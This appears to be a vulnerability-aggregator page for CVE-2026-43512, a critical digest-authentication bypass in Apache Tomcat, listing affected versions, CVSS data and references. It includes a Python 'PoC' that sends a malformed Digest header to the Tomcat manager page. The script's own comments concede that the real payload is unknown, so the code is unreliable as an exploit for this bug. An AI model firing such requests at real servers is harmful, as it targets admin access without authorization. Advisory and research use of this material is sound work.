Security Vulnerability Report
CVE-2026-43512 CVSS 9.8 CRITICAL

Published: 2026-05-12 16:16:18
Last Modified: 2026-05-14 20:17:06

Description

DEPRECATED: Authentication Bypass Issues vulnerability in digest authentication in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, and from before 7.0.0. Older, unsupported versions may also be affected. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118, which fix the issue.

CVSS Details

CVSS Score: 9.8 (exploitability sub-score 3.9, impact sub-score 5.9)
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (network attack vector, low complexity, no privileges or user interaction required, scope unchanged, high confidentiality/integrity/availability impact)
Weakness: CWE-592

Configurations (Affected Products)

No CPE configuration data is available for this record. Affected version ranges, as stated in the description:

Apache Tomcat 11.0.0-M1 - 11.0.21
Apache Tomcat 10.1.0-M1 - 10.1.54
Apache Tomcat 9.0.0.M1 - 9.0.117
Apache Tomcat 8.5.0 - 8.5.100
Apache Tomcat < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target URL (a protected resource requiring Digest Auth)
target_url = "http://target-tomcat:8080/manager/html"

# In a real digest auth bypass scenario, the specific manipulation depends on the bug.
# This PoC demonstrates attempting to access a resource without valid credentials
# or with a malformed Authorization header to trigger the bypass.
headers = {
    # Attempting to bypass by sending a malformed or crafted Authorization header.
    # The exact payload depends on the specific vulnerability details.
    "Authorization": "Digest username=\"admin\", realm=\"Tomcat Manager Application\", "
                     "nonce=\"\", uri=\"/manager/html\", response=\"\""
}

try:
    response = requests.get(target_url, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Potential Bypass Successful! Resource accessed.")
        print("[+] Response Body:")
        print(response.text[:500])
    else:
        print(f"[-] Bypass Failed. Status Code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

https://lists.apache.org/thread/7x09x7o12solvclslw3sz0288xc8wx73 (Apache mailing-list thread)
http://www.openwall.com/lists/oss-security/2026/05/12/8 (oss-security mailing-list post)